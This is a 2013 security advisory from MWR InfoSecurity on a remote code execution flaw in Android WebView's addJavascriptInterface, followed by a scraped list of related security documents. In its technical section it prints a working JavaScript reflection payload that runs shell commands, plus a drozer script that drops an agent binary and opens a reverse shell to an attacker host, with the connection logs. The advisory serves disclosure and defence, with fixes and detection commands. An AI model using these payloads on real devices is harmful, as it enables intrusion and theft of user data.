WebView addjavascriptinterface Remote Code Execution 23/09/2013
|
|
- Katrina Kelly
- 8 years ago
- Views:
Transcription
1 MWR InfoSecurity Advisory WebView addjavascriptinterface Remote Code Execution 23/09/2013 Package Name Date Affected Versions Google Android Webkit WebView 23/09/2013 All Android applications built with or against API versions less than 17 Author Severity Local/Remote Vulnerability Class Vendor Dave Hartley High Remote Remote Command Execution Google Description Many free mobile applications use a WebView to load HTML content as an in process web browser to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary Java Script into the WebView. If the WebView provides access to native functionality via JavaScript bridge utilising the addjavascriptinterface method, then the WebView Java Script bridge can then be abused to execute arbitrary Java code. This is achieved by using reflection to acquire a reference to a runtime object via the interface implemented. Impact The addjavascriptinterface method can be abused via reflection to execute commands remotely in the context of the running application. Cause The addjavascriptinterface method exposes a supplied Java object from within a WebView to JavaScript. For applications compiled or linked against and API level less than 17; all public methods (including the inherited ones) can be accessed. Through the use of reflection it is also possible to invoke any other unregistered Java class. Interim Workaround Android users should remove any and all applications that embed advertisements. Alternatively ensure that you do not connect to untrusted networks while using applications with embedded advertisements. Solution This issue has been resolved in applications developed for Android 4.2 (API level 17) and above. Starting from Android 4.2 (API level 17) and above, only methods explicitly marked with annotation are available to JavaScript code within the WebView. The '@JavascriptInterface' annotation must be added to any method that is intended to be exposed via the native bridge (the method must also be public). An example is presented below: mwrinfosecurity.com MWR InfoSecurity 1 of 6
2 @JavascriptInterface public void method() { dostuff(); To resolve the issue the ad networks would need to re- engineer their SDK's and to build them for API 17 or above. All of the app developers using the old and vulnerable SDK's will need to link against the new SDK's and redistribute their applications. Android users would need to upgrade their applications - and possibly devices, to use the new non- vulnerable applications. It would also be advisable for the ad networks to only serve content over an encrypted channel (SSL/TLS). We expect this issue to be around for some time. Technical Description Recently we have been researching vulnerabilities within cross platform mobile application development frameworks. Whilst performing this research we have identified a number of issues. This advisory will detail one of the more serious of the issues, which affects all current Android platforms and devices. The issue allows an attacker to execute arbitrary code on Android devices. The vulnerability is exploited by injecting JavaScript into a WebView ( We have released output from related research previously; see the previous post "Adventures With Android WebViews" for background information here with- android- webviews. Lately we have been analysing mobile advertising networks and in particular the Software Development Kit (SDK) that the networks make available to application developers for the purpose of monetising their applications. During this research we have found that a lot of applications expose mobile device users to the threat of compromise. We have found a number of exploitable (cross platform) vulnerabilities and expect to find more as research continues. We are in the early stages of the research and we will be conducting further research in this area; however we have decided to release this advisory now as to help Android users take appropriate actions to protect themselves. Many advertising networks make an SDK available to application developers to 'ease' integration. The SDK contains header files and a static library. Header files contain function declarations that are imported into a project so that the functions can be called. The library file contains the actual executable code that does the work. This is linked in by the linker to provide the actual functionality (the definitions rather than just the declarations). The advertising networks require the application to display content within a WebKit WebView. WebKit is an open source web browser engine that powers browsers such as Google Chrome, Apple Safari, the default ios and Android browsers etc. WebView is the core view class in the WebKit framework. Many free apps use a WebView to load HTML content as an in- process web browser and the advertising network SDK uses the browser instance to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary JavaScript into the WebView. Advertising networks gather metrics so that they can tailor campaigns and target specific 'audiences'. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Advertising networks also want to leverage the mobile device platform to deliver 'rich media' advertisements. To achieve their goals, access to the platform/devices native capabilities is often required. This is realised by implementing a "native bridge". It is possible to call 'native' code from a rendered WebView by using JavaScript. This is achieved on the Android platform in two different ways, the first is to use the public methods 'shouldoverrideurlloading' - see the Android developer site for details on this method here MWR InfoSecurity 2 of 6
3 d.webkit.webview,%20java.lang.string). An example implementation is public boolean shouldoverrideurlloading(webview view, String url) { if (url.substring(0,6).equalsignorecase("yourscheme:")) { // parse the URL object and execute functions A call into Java can then be initiated from Java Script by passing parameters within the URL: window.location = yourscheme://method?parameter=value The second method available for the Android platform is to use the android.webkit.javascriptinterface interface - see the Android developer site for details on the interface - An example implementation is below: public class WebViewGUI extends Activity { WebView mwebview; public void oncreate(bundle savedinstancestate) { super.oncreate(savedinstancestate); mwebview=new WebView(this); mwebview.getsettings().setjavascriptenabled(true); mwebview.addjavascriptinterface(new JavaScriptInterface(), "jsinterface"); mwebview.loadurl("file:///android_asset/www/index.html"); setcontentview(mwebview); final class JavaScriptInterface { JavaScriptInterface () { public String getsomestring() { return "string"; A call into Java can be initiated from Java Script as such: var String = window.jsinterface.getsomestring(); The WebView JavaScript bridge can be abused to execute arbitrary Java code, by using reflection to acquire a reference to a runtime object via the interface implemented in the Java code above. Note: The JavaScriptInterface can be named anything, "jsinterface" has been chosen for illustration purposes only. The issue has been disclosed publically in an article authored by 'Neil' titled "Abusing WebView JavaScript Bridges" ( on December the 21st, The issue is alluded to in a paper titled "Static Analysis of Dalvik Bytecode and Reflection in Android" authored by Erik Ramsgaard Wognsen and Henrik Søndberg Karlsen, the paper can be found here However we found no other references to it or discussions with regards to active exploitation online, prior to presenting this issue and related research on the 13 th September at the 44CON conference. On the 16th September the following was posted online, 2/analyzing- android- webview- exploit detailing how the issue can be used to send SMS. MWR InfoSecurity 3 of 6
4 The following JavaScript, if injected into a WebView that implements a native bridge using the android.webkit.javascriptinterface interface, will result in the execution of operating system commands (via java.lang.runtime) - see the Android developer site for details here <script> function execute(cmd){return window.jsinterface.getclass().forname('java.lang.runtime').getmethod('getrunt ime',null).invoke(null,null).exec(cmd); execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']); </script> We can go even further and use this vector to drop in a 'drozer' payload for a much more feature rich exploitation experience; drozer is an Android security assessment framework (think Metasploit for Android) and can be found here Weasel is a binary that aids in the loading and running of a drozer agent once code execution has been gained on an Android device (think meterpreter for Android). To do this we can use drozer to generate a 'weasel' payload. $ drozer payload list shell.reverse_tcp.armeabi Establish a reverse TCP Shell (ARMEABI) weasel.reverse_tcp.armeabi weasel through a reverse TCP Shell (ARMEABI) weasel.shell.armeabi Deploy weasel, through a set of Shell commands (ARMEABI) $ drozer payload build weasel.shell.armeabi grep echo awk -F \" {'gsub("\\\\","\\\\"); print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"' Which will give you a one liner to embed into the JavaScript payload: execute(['/system/bin/sh','-c','echo -e " " > '+path]); The payload we are going to inject (with the binary stripped for readability) is below: $ cat drozer.js var host = ' '; var port = '31415'; var path = '/data/data/com.vuln.app/files/weasel'; function execute(cmd){return window.interface.getclass().forname('java.lang.runtime').getmethod('getruntim e',null).invoke(null,null).exec(cmd); execute(['/system/bin/rm',path]); execute(['/system/bin/sh','-c','echo -e " " > '+path]); execute(['/system/bin/chmod','770',path]); execute([path,host,port]); If the payload is injected into the WebView as above it will write and execute the weasel payload. The command below starts the drozer server and as can be seen, the payload has executed and connected back to the drozer server: $ drozer server start Starting drozer Server, listening on : :02:08,238 - drozer.server.protocols.http - INFO - GET /agent.jar :02:08,256 - drozer.server.protocols.http - INFO - GET /agent.apk MWR InfoSecurity 4 of 6
5 :02:08,808 - drozer.server.protocols.drozerp.droidhg - INFO - accepted connection from 47k5n8v3nbdpg :02:08,834 - drozer.server.protocols.shell - INFO - accepted shell from :63804 The command below will list the connected remote devices: $ drozer console devices List of Bound Devices Device ID Manufacturer Model Software 47k5n8v3nbdpg unknown unknown unknown The command below can then be used to connect to our listening console: $ drozer console connect 47k5n8v3nbdpg....:...o...r....a nd ro..idsnemesisand..pr.otectorandroidsneme..,sisandprotectorandroids+...nemesisandprotectorandroidsn:..emesisandprotectorandroidsnemes....isandp,..,rotectorandro,..,idsnem..isisandp..rotectorandroid..snemisis.,andprotectorandroidsnemisisandprotec..torandroidsnemesisandprotectorandroid..snemisisandprotectorandroidsnemesisan:.dprotectorandroidsnemesisandprotector. drozer Console (v2.3.0) dz> At this point, the attacker is able to perform a number of attacks against the device using drozer. The lowest impact attack would be downloading contents of the SD card and the exploited application's data directory. However, depending on the device that was exploited this could extend to obtaining root privileges, retrieving other sensitive user data from the device or causing the user monetary loss. We have analysed a large number of advertising network SDK's and found that a lot of these implement bridges that are vulnerable to exploitation. Some advertising network SDK's obtained from the advertising networks directly were found to not be vulnerable (in their most recent versions). However a lot of applications on the "Google Play Store" were found to be using old versions of the SDK's, which are vulnerable. Note: If the linked SDK has been built for an API lower than 17, the vulnerability exists - even if the application using the SDK has been built for API 17 or above. This issue is exploitable on all devices and versions of Android. The command below can be used to identify the presence of the JavascriptInterface (after decompiling the app you are inspecting): $ grep -r -n -i --include=*.java addjavascriptinterface * The command below can be used to indicate if the code has been built for API 17 (or above) and includes the '@JavascriptInterface' annotation: MWR InfoSecurity 5 of 6
6 $ grep -r -i --include=*.java * Note: Packages were decompiled using jd- gui in order to ensure annotations were included. On the 30th of July 2013, MWR downloaded the top 100 Android applications in the "Google Play Store" and analysed the applications. Out of the apps that were profiled, there were a number of apps which did not use ads as a monetisation strategy, due to being popular subscription services (like Netflix) or being free services funded in some other way (such as ebay). This means that (as of 30/07/2013) 21/100 of the top 100 free apps are ad- free. Of the remaining 79 applications it was discovered that many used multiple advertising libraries or frameworks are in use. The results are presented below: Number of ad networks identified Admob (Google) InMobi MdotM Admarvel Flurry Tapjoy Millenial Media Medialets Greystipe adwhirl freewheel Number of ad frameworks identified: MoPub Burstly Mobclix Mocean These applications were examined to determine how many are vulnerable to this issue. The APK's for the applications were downloaded and decompiled. The source was searched for the use of "addjavascriptinterface" before being searched for the presence of the "@JavascriptInterface" annotation. Any package or linked ad SDK that contained the annotation was dismissed. The findings indicated that 62 of the 100 apps are 'potentially' vulnerable. Not all of the interfaces are implemented within ad networks and not all of the interfaces are present in WebViews that load content remotely over a clear text channel. We didn't investigate each and every package. A script was then crafted to automatically download Android applications, decompile them and identify if an ad network was in use, and if so determine if it is vulnerable. Out of the 1,000 top applications 570 were found to be vulnerable. According to AppBrain ( and- paid- android- applications) on the 30/07/2013 there were 655,325 free apps and 153,813 paid apps; 809,138 apps in total. AppBrain is a website for discovering Android apps. AppBrain also includes stats on the number of apps that integrate ad network SDK's ( out of all of the apps in the "Google Play Store". This clearly illustrates just how many applications are potential targets for attack. The page lists 77 ad networks/ad frameworks. It is unfeasible for us to analyse each and every SDK to determine its exploitability and as previously stated; even if the latest SDK available is not vulnerable, there may well be apps in the market place that haven't upgraded their SDK from a vulnerable version and are therefore vulnerable. MWR InfoSecurity 6 of 6
MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July 2008. Contents
Contents MWR InfoSecurity Security Advisory pfsense DHCP Script Injection Vulnerability 25 th July 2008 2008-07-25 Page 1 of 10 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical
More informationMWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents
Contents MWR InfoSecurity Security Advisory BT Home Hub SSID Script Injection Vulnerability 10 th May 2010 2010-05-10 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical
More informationPractical Exploitation Using A Malicious Service Set Identifier (SSID)
Practical Exploitation Using A Malicious Service Set Identifier (SSID) Deral Heiland Senior Security Engineer CDW Advanced Technology Services Mike Belton Technical Lead CDW Advanced Technology Services
More informationUNRESTRICTED EXTERNAL
drozer Users Guide mwrinfosecurity.com MWR InfoSecurity UNRESTRICTED EXTERNAL 1 Contents page Change Synopsis... 3 1. Introduction... 4 1.1 What is drozer?... 4 1.2 Conventions... 4 2. Getting Started...
More informationAttacks on WebView in the Android System
Attacks on WebView in the Android System Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin Dept. of Electrical Engineering & Computer Science, Syracuse University Syracuse, New York, USA ABSTRACT
More informationMWR InfoSecurity Security Advisory. Symantec s Altiris Deployment Solution File Transfer Race Condition. 7 th January 2010
al al MWR InfoSecurity Security Advisory Symantec s Altiris Deployment Solution File Transfer Race Condition 7 th January 2010 20010-01-07 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description...4
More informationTushar Dalvi Sr. Security Engineer at LinkedIn Penetration Tester. Responsible for securing a large suite mobile apps
Tony Trummer Staff Engineer, Information Security at LinkedIn Penetration tester and mobile security enthusiast #3 in Android Security Acknowledgements Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration
More informationthe cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level
Click to edit Master title style Click to edit Master text styles The Second nightmare level behind Third level the cross platform Fourth level» Fifth level mobile apps dream Marco Grassi @marcograss MGrassi@nowsecure.com
More informationSmartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
More informationBlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note
BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise
More informationCross-site site Scripting Attacks on Android WebView
IJCSN International Journal of Computer Science and Network, Vol 2, Issue 2, April 2013 1 Cross-site site Scripting Attacks on Android WebView 1 Bhavani A B 1 Hyderabad, Andhra Pradesh-500050, India Abstract
More informationSecuring ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH
Securing ios Applications Dr. Bruce Sams, OPTIMAbit GmbH About Me President of OPTIMAbit GmbH Responsible for > 200 Pentests per Year Ca 50 ios Pentests and code reviews in the last two years. Overview
More informationAdobe Flash Player and Adobe AIR security
Adobe Flash Player and Adobe AIR security Both Adobe Flash Platform runtimes Flash Player and AIR include built-in security and privacy features to provide strong protection for your data and privacy,
More informationLecture 1 Introduction to Android
These slides are by Dr. Jaerock Kwon at. The original URL is http://kettering.jrkwon.com/sites/default/files/2011-2/ce-491/lecture/alecture-01.pdf so please use that instead of pointing to this local copy
More informationAPPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK
APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK John T Lounsbury Vice President Professional Services, Asia Pacific INTEGRALIS Session ID: MBS-W01 Session Classification: Advanced
More informationThe Lifetime of Android API vulnerabilities: case study on the JavaScript-to-Java interface
1 The Lifetime of Android API vulnerabilities: case study on the JavaScript-to-Java interface Daniel R. Thomas 1, Alastair R. Beresford 1, Thomas Coudray 2, Tom Sutcliffe 2, and Adrian Taylor 2 1 Computer
More informationLegal notices. Legal notices. For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html.
ADOBE AIR Security Legal notices Legal notices For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html. iii Contents Installing and updating desktop applications...........................................................................
More informationKonyOne Server Prerequisites _ MS SQL Server
KonyOne Server Prerequisites _ MS SQL Server KonyOne Platform Release 5.0 Copyright 2012-2013 Kony Solutions, Inc. All Rights Reserved. Page 1 of 13 Copyright 2012-2013 by Kony Solutions, Inc. All rights
More informationANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I)
ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I) Who am I? Lo Chi Wing, Peter Lecture 1: Introduction to Android Development Email: Peter@Peter-Lo.com Facebook: http://www.facebook.com/peterlo111
More informationThe Android Developers Guide to 3 rd -Party SDK Assessment and Security
SESSION ID: MBS-F02 The Android Developers Guide to 3 rd -Party SDK Assessment and Security Yang Yang( 杨 德 志 ) Mobile Security Researcher and Developer, Trend Micro Advantages of 3 rd -Party SDKs Speed
More informationHP AppPulse Mobile. Adding HP AppPulse Mobile to Your Android App
HP AppPulse Mobile Adding HP AppPulse Mobile to Your Android App Document Release Date: April 2015 How to Add HP AppPulse Mobile to Your Android App How to Add HP AppPulse Mobile to Your Android App For
More informationWorkday Mobile Security FAQ
Workday Mobile Security FAQ Workday Mobile Security FAQ Contents The Workday Approach 2 Authentication 3 Session 3 Mobile Device Management (MDM) 3 Workday Applications 4 Web 4 Transport Security 5 Privacy
More informationRecent Advances in Web Application Security
Recent Advances in Web Application Security Author: Neelay S Shah Principal Security Consultant Foundstone Professional Services Table of Contents Introduction 3 Content Security Policy 3 Best Practices
More informationMercury User Guide v1.1
Mercury User Guide v1.1 Tyrone Erasmus 2012-09-03 Index Index 1. Introduction... 3 2. Getting started... 4 2.1. Recommended requirements... 4 2.2. Download locations... 4 2.3. Setting it up... 4 2.3.1.
More informationHTML5 / NATIVE / HYBRID
HTML5 / NATIVE / HYBRID Ryan Paul Developer Evangelist @ Xamarin NATIVE VERSUS HTML5? REFRAMING THE DEBATE It s not a battle to the death. It s a choice: what solution will work best for your application?
More informationAndroid Development. Marc Mc Loughlin
Android Development Marc Mc Loughlin Android Development Android Developer Website:h:p://developer.android.com/ Dev Guide Reference Resources Video / Blog SeCng up the SDK h:p://developer.android.com/sdk/
More informationDefending Behind The Device Mobile Application Risks
Defending Behind The Device Mobile Application Risks Tyler Shields Product Manager and Strategist Veracode, Inc Session ID: MBS-301 Session Classification: Advanced Agenda The What The Problem Mobile Ecosystem
More informationOUT OF POCKET: A Comprehensive Mobile Threat Assessment of 7 Million ios and Android Apps FEBRUARY 2015 SECURITY REIMAGINED
S P E C I A L R E P O R T OUT OF POCKET: A Comprehensive Mobile Threat Assessment of 7 Million ios and Android Apps FEBRUARY 2015 SECURITY REIMAGINED CONTENTS FEBRUARY 2015 Executive Summary 3 Introduction
More informationAppConnect FAQ for MobileIron Technology Partners! AppConnect Overview
AppConnect FAQ for MobileIron Technology Partners! AppConnect Overview What is AppConnect? AppConnect is a MobileIron product that secures and protects enterprise mobile apps. It manages the complete lifecycle
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationPenetration Testing for iphone Applications Part 1
Penetration Testing for iphone Applications Part 1 This article focuses specifically on the techniques and tools that will help security professionals understand penetration testing methods for iphone
More informationBuilding a Mobile App Security Risk Management Program. Copyright 2012, Security Risk Advisors, Inc. All Rights Reserved
Building a Mobile App Security Risk Management Program Your Presenters Who Are We? Chris Salerno, Consultant, Security Risk Advisors Lead consultant for mobile, network, web application penetration testing
More informationAppUse - Android Pentest Platform Unified
AppUse - Android Pentest Platform Unified Standalone Environment AppUse is designed to be a weaponized environment for Android application penetration testing. It is a unique, free, and rich platform aimed
More informationITP 140 Mobile Technologies. Mobile Topics
ITP 140 Mobile Technologies Mobile Topics Topics Analytics APIs RESTful Facebook Twitter Google Cloud Web Hosting 2 Reach We need users! The number of users who try our apps Retention The number of users
More informationMake a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
More informationHello World. by Elliot Khazon
Hello World by Elliot Khazon Prerequisites JAVA SDK 1.5 or 1.6 Windows XP (32-bit) or Vista (32- or 64-bit) 1 + more Gig of memory 1.7 Ghz+ CPU Tools Eclipse IDE 3.4 or 3.5 SDK starter package Installation
More informationAGENDA. Background. The Attack Surface. Case Studies. Binary Protections. Bypasses. Conclusions
MOBILE APPLICATIONS AGENDA Background The Attack Surface Case Studies Binary Protections Bypasses Conclusions BACKGROUND Mobile apps for everything == lots of interesting data Banking financial Social
More informationSecurity Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0
Security Guide BlackBerry Enterprise Service 12 for ios, Android, and Windows Phone Version 12.0 Published: 2015-02-06 SWD-20150206130210406 Contents About this guide... 6 What is BES12?... 7 Key features
More informationPortability Study of Android and ios
Portability Study of Android and ios Brandon Stewart Problem Report submitted to the Benjamin M. Statler College of Engineering and Mineral Resources at West Virginia University in partial fulfillment
More informationA Large-Scale Study of Mobile Web App Security
A Large-Scale Study of Mobile Web App Security Patrick Mutchler, Adam Doupé, John Mitchell, Chris Kruegel and Giovanni Vigna Stanford University {pcm2d, mitchell}@stanford.edu Arizona State University
More informationMike Zusman 3/7/2011. OWASP Goes Mobile SANS AppSec Summit 2011
Mike Zusman 3/7/2011 OWASP Goes Mobile SANS AppSec Summit 2011 Agenda Introductions OWASP Summit Recap OWASP Mobile Top 10 v0.1 (DRAFT) 2 Who Are We Other than carbon-based multi-cellular life forms 3
More informationBYPASSING THE ios GATEKEEPER
BYPASSING THE ios GATEKEEPER AVI BASHAN Technology Leader Check Point Software Technologies, Ltd. OHAD BOBROV Director, Mobile Threat Prevention Check Point Software Technologies, Ltd. EXECUTIVE SUMMARY
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
More informationBuilding Secure Mobile Applications Using MaaS360 SDK and IBM Worklight
Building Secure Mobile Applications Using MaaS360 SDK and IBM Worklight Karthik Ramgopal/Paras Segal kramgopal@fiberlink.com psegal@fiberlink.com www.maas360.com Why Mobile Applications are a Must? Rising
More informationEnterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
More informationTop Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore
Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over
More informationTrend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox
Trend Micro Incorporated Research Paper 2012 Adding Android and Mac OS X Malware to the APT Toolbox Contents Abstract... 1 Introduction... 1 Technical Analysis... 2 Remote Access Trojan Functionality...
More informationAndroid Development. http://developer.android.com/develop/ 吳 俊 興 國 立 高 雄 大 學 資 訊 工 程 學 系
Android Development http://developer.android.com/develop/ 吳 俊 興 國 立 高 雄 大 學 資 訊 工 程 學 系 Android 3D 1. Design 2. Develop Training API Guides Reference 3. Distribute 2 Development Training Get Started Building
More informationCitrix Worx App SDK Overview
Citrix Worx App SDK Overview Table of Contents Introduction... 3 About the App Catalog Deployment Model... 3 About the Citrix MDX Toolkit... 4 The Worx App SDK... 5 The Unmanaged and Managed Modes of Worx
More informationShellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
More informationDevelop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java. Drupaldelphia 2014 By Joe Roberts
Develop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java Drupaldelphia 2014 By Joe Roberts Agenda What is DrupalGap and PhoneGap? How to setup your Drupal website
More informationUniversal Mobile Ads is a plugin for Unreal Engine 4 that enables the MoPub ad mediation system for ios & Android.
Contents 1. License... 3 2. Introduction... 3 3. Supported Ad Formats... 5 a. Banner... 5 b. Interstitial... 5 c. Rewarded Video... 6 4. Supported Ad Networks... 7 5. Getting started... 8 6. Configure
More information"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION
"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION CHECK POINT ALERTED EZCAST THAT ITS SMART TV DONGLE, WHICH IS USED BY APPROXIMATELY 5 MILLION USERS, IS EXPOSED TO SEVERE REMOTE CODE EXECUTION VULNERABILITIES
More informationBASIC COMPONENTS. There are 3 basic components in every Apache Cordova project:
Apache Cordova is a open-source mobile development framework. It allows you to use standard web technologies such as HTML5, CSS3 and JavaScript for cross-platform development, avoiding each mobile platform
More informationAnalysis of advanced issues in mobile security in android operating system
Available online atwww.scholarsresearchlibrary.com Archives of Applied Science Research, 2015, 7 (2):34-38 (http://scholarsresearchlibrary.com/archive.html) ISSN 0975-508X CODEN (USA) AASRC9 Analysis of
More informationIntroduction to Android
Introduction to Android 26 October 2015 Lecture 1 26 October 2015 SE 435: Development in the Android Environment 1 Topics for Today What is Android? Terminology and Technical Terms Ownership, Distribution,
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationProgramming IoT Gateways With macchina.io
Programming IoT Gateways With macchina.io Günter Obiltschnig Applied Informatics Software Engineering GmbH Maria Elend 143 9182 Maria Elend Austria guenter.obiltschnig@appinf.com This article shows how
More informationABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationIndex. AdWords, 182 AJAX Cart, 129 Attribution, 174
Index A AdWords, 182 AJAX Cart, 129 Attribution, 174 B BigQuery, Big Data Analysis create reports, 238 GA-BigQuery integration, 238 GA data, 241 hierarchy structure, 238 query language (see also Data selection,
More informationPwning Intranets with HTML5
Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for
More informationBuilding native mobile apps for Digital Factory
DIGITAL FACTORY 7.0 Building native mobile apps for Digital Factory Rooted in Open Source CMS, Jahia s Digital Industrialization paradigm is about streamlining Enterprise digital projects across channels
More informationIntroduction to Mobile Access Gateway Installation
Introduction to Mobile Access Gateway Installation This document describes the installation process for the Mobile Access Gateway (MAG), which is an enterprise integration component that provides a secure
More informationWeb applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
More informationSilk Test 17.0. Testing Mobile Applications
Silk Test 17.0 Testing Mobile Applications Micro Focus The Lawn 22-30 Old Bath Road Newbury, Berkshire RG14 1QN UK http://www.microfocus.com Copyright Micro Focus 1992-2016. All rights reserved. MICRO
More informationSelf Testing with MoPub SDK
Self Testing with MoPub SDK What: SimpleAds Demo is an iphone and Android application that displays the three basic type of ads offered through MoPub Banner (320x50), MRect (300x200), and Interstitial
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationECWM511 MOBILE APPLICATION DEVELOPMENT Lecture 1: Introduction to Android
Why Android? ECWM511 MOBILE APPLICATION DEVELOPMENT Lecture 1: Introduction to Android Dr Dimitris C. Dracopoulos A truly open, free development platform based on Linux and open source A component-based
More informationMocean Android SDK Developer Guide
Mocean Android SDK Developer Guide For Android SDK Version 3.2 136 Baxter St, New York, NY 10013 Page 1 Table of Contents Table of Contents... 2 Overview... 3 Section 1 Setup... 3 What changed in 3.2:...
More informationIntroduction to IBM Worklight Mobile Platform
Introduction to IBM Worklight Mobile Platform The Worklight Mobile Platform The Worklight Mobile Platform is an open, complete and advanced mobile application platform for HTML5, hybrid and native apps.
More informationTroubleshooting BlackBerry Enterprise Service 10 version 10.1.1 726-08745-123. Instructor Manual
Troubleshooting BlackBerry Enterprise Service 10 version 10.1.1 726-08745-123 Instructor Manual Published: 2013-07-02 SWD-20130702091645092 Contents Advance preparation...7 Required materials...7 Topics
More informationAdvertiser Campaign SDK Your How-to Guide
Advertiser Campaign SDK Your How-to Guide Using Leadbolt Advertiser Campaign SDK with Android Apps Version: Adv2.03 Copyright 2012 Leadbolt All rights reserved Disclaimer This document is provided as-is.
More informationPentesting Android Apps. Sneha Rajguru (@Sneharajguru)
Pentesting Android Apps Sneha Rajguru (@Sneharajguru) About Me Penetration Tester Web, Mobile and Infrastructure applications, Secure coding ( part time do secure code analysis), CTF challenge writer (at
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationHow To Use Titanium Studio
Crossplatform Programming Lecture 3 Introduction to Titanium http://dsg.ce.unipr.it/ http://dsg.ce.unipr.it/?q=node/37 alessandro.grazioli81@gmail.com 2015 Parma Outline Introduction Installation and Configuration
More informationSecurity Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationThreat Model for Mobile Applications Security & Privacy www.datatheorem.com
Overview Mobile applications (and the devices they run on) are powerful, as they can play music, check email, read documents, purchase products, get directions, play games, watch movies, scan barcodes,
More informationSimplifying and Empowering the Implementation of Enterprise Mobile Strategy
